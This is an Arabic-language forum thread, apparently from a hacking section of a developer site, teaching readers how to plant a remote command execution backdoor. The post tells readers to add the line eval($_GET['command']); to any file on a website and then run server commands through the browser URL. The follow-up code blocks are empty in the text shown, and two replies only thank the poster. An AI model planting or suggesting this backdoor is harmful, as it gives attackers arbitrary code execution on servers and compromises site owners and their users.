development-point

development-point (https://vb.development-point.com/index.php)
-   قسم اختراق المواقع والسيرفرات (https://vb.development-point.com/forumdisplay.php?f=44)
-   -   زرع ثغره Remote Command Execution بطريقه سهله (https://vb.development-point.com/showthread.php?t=20151)

box 11-16-2013 02:49 AM
زرع ثغره Remote Command Execution بطريقه سهله
 
بسم الله الرحمن الرحيم



السلام عليكم ورحمه الله وبركاته

تعريف الثغره للي ما يعرفها
الثغره تسمح لك بتنفيذ أوامر مباشره على السيرفر عن بعد !
أفتح أي ملف بالموقع وأضيف هذا السطر

كود PHP:
eval($_GET['command']);

الاستغلال :
 كود PHP:



وإذا ما نفع جرب :
 كود PHP:

وإذا ما نفع جرب :
 كود PHP:



واستبدل XX بألامر اللي تبغى تنفذه .. والنتيجه راح تظهر بالمتصفح ::
وطبعاً استبدل site.com بدومين الموقع وfile.php بإسم الملف اللي وضعت فيه السطر ::

EDZw4sS!m 11-17-2013 12:40 AM
رد: زرع ثغره Remote Command Execution بطريقه سهله
 
مشكور واصل

box 11-17-2013 09:14 AM
رد: زرع ثغره Remote Command Execution بطريقه سهله
 
شكراً على مرورك يا بعدي ان شاء الله الفآئده لكم لي الشبآب:~


الساعة الآن 12:20 PM

Powered by vBulletin® Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.
development-point

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47